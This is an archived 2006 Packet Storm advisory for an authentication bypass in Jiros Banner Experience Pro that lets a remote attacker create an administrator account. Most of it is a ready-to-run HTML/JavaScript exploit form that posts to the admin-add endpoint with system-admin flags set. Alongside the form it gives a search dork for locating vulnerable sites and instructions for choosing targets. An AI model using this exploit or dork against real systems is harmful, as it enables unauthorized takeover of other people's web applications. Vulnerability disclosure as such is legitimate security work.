Jiros.txt

2006-03-10T00:00:00
ID PACKETSTORM:44533
Type packetstorm
Reporter Mustafa Can Bjorn
Modified 2006-03-10T00:00:00

Description

                                        
                                            `--Security Report--  
Advisory: Jiros Banner Experience Pro Remote Privilege Escalation.  
---  
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI  
---  
Date: 07/03/06 04:52 AM  
---  
Contacts:{  
ICQ: 10072  
MSN/Email: nukedx@nukedx.com  
Web: http://www.nukedx.com  
}  
---  
Vendor: Jiros (http://www.jiros.net)  
Version: 1.0 and prior versions must be affected.  
About: Via this method remote attacker can by pass security control of system  
and edit all options.  
Level: Critical  
---  
How&Example:  
Security control in admin panel's index did not sanitized properly.  
GET/EXAMPLE -> http://[victim]/[JBPSDir]/files/ wtih this example remote attack  
bypasses security control,  
but s/he will get some errors because ; s/he did not logged in system and doesnt  
have admin cookies so lets add a new  
admin account :)  
GET/EXAMPLE -> http://[victim]/[JBPSDir]/files/addadmin.asp so with this example  
remote attacker can make admin account  
succesfully and when he logins via http://[victim]/[JBPSDir]/files/login.asp can  
take whole system control.  
---  
Timeline:  
* 07/03/2006: Vulnerability found.  
* 07/03/2006: Contacted with vendor and waiting reply.  
---  
Exploit:  
http://www.nukedx.com/?getxpl=19  
With this exploit remote attacker can make new admin account.  
  
<html>  
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>  
<body bgcolor="#000000">  
<style>  
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}  
</style>  
<script language="JavaScript">  
function jbxpl() {  
if (document.xplt.victim.value=="") {  
alert("Please enter site!");  
return false;  
}  
if (confirm("Are you sure?")) {  
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";  
xplt.aName.value=document.xplt.aName.value;  
xplt.aEmail.value=document.xplt.aEmail.value;  
xplt.aPassword.value=document.xplt.aPassword.value;  
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;  
xplt.aIsActive=document.xplt.aIsActive.value;  
xplt.submit();  
}  
}  
</script>  
<strong>  
<font class="xpl" color="#00FF40">  
<pre>  
<center>  
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit  
This exploit has been coded by nukedx  
You can found original advisory on http://www.nukedx.com/?viewdoc=19  
Dork for this exploit: <u>inurl:JBSPro</u>  
Your target must be like that: www.victim.com/Path/  
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp  
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/  
For second example your target must be www.victim.com/  
You can login with your admin account via www.victim.com/JBSPath/files/login.asp  
Have phun  
<form name="xplt" method="POST" onsubmit="jbxpl();">  
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">  
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">  
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">  
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">  
<input type="hidden" name="aIsSystemAdmin" value="True">  
<input type="hidden" name="aIsActive" value="True">  
<input type="submit" value="Send" class="xpl">  
</form>  
</pre>  
</font>  
</strong>  
</body>  
</html>  
  
Save this code as .htm and then execute.  
  
# nukedx.com [2006-03-07]  
  
  
  
---  
Dorks:  
inurl:JBSPro  
---  
Original advisory: http://www.nukedx.com/?viewdoc=19  
  
`